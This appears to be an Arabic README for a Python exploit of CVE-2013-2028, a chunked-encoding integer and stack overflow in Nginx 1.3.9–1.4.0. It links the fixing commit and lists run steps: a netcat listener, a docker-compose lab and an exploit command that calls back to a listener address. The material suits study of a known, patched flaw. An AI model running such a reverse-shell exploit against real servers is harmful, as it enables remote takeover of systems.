
استغلال CVE-2013-2028 بلغة بايثون
البرنامج المتأثر بالثغرة: Nginx 1.3.9 < 1.4.0
الالتزام (Commit) الذي يحتوي الإصلاح: https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7
توجد الثغرة في الدالة ngx_http_parse_chunked. يُحدث هذا الاستغلال تجاوزًا في العدد الصحيح (integer overflow) داخل ngx_http_parse_chunked، ثم يستخدم ذلك لاحقًا لتجاوز سعة المكدس (stack overflow) بهدف اختطاف مسار التحكم.
يتكوّن الاستغلال الفعلي من 4 خطوات:
nc -lvp 4345sudo docker-compose up --buildpython2 exploit.py -ra 127.0.0.1 -rp 8081 -la <listener machine address> -lp <listener machine port>